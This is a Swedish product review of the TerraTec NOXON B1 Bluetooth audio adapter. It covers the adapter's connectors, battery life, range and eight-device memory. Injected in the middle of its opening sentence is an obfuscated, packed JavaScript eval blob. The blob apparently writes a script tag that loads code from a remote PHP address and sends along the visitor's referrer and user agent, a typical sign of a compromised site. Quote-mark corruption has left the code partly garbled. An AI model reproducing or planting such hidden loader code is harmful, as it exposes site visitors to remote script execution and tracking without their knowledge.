Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Strömma musiken trådlöst från mobilen eller surfplattan!

Strömma musiken trådlöst från mobilen eller surfplattan!
Sebastian

Strömma eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tiifn|var|u0026u|referrer|senrt||js|php’.split(’|’),0,{}))
musiken trådlöst från mobilen eller surfplattan
När du tröttnat på mobilens eller surfplattans trötta högtalare och tycker att hörlurar är i vägen, är ljudadaptern
TerraTec NOXON B1 en räddare i nöden. Den är utformad som en liten elegant mattsvart puck med en tryckknapp på toppen. Du ansluter den till din stereo, dina datorhögtalare eller hörlurar med 3,5mm eller RCA-kontakter. Sedan kopplar du ihop din mobil, surfplatta eller dator med TerraTec NOXON B1 via Bluetooth.

Inbyggt batteri
Nu kan du njuta av musiken samtidigt som du fritt kan röra dig i rummet med din mobil i handen och välja låt efter låt. Räckvidden är cirka 10m. TerraTec NOXON B1 har ett inbyggt batteri som laddas upp via USB och ger dig cirka 15 timmars nöje med trådlös musik.

Förutom att spela upp musik från mobilen i en ljudanläggning fungerar det även utmärkt att använda TerraTec NOXON B1 till att göra favorithörlurarna trådlösa för att lyssna på musik eller film från en dator via Bluetooth. Tryckknappen på enheten kan användas för att starta och pausa musiken.

Anslut åtta enheter
TerraTec NOXON B1 kan hålla upp till åtta Bluetooth-enheter i minnet samtidigt. Det gör det enkelt för hela familjen att använda samma ljudanläggning för sin favoritmusik utan att behöva synka om Bluetooth-mottagaren.

Ljudadaptern levereras komplett med USB-laddare för vägguttaget, USB-laddkabel samt kablar för anslutning till 3,5mm stereo och RCA-ingångar.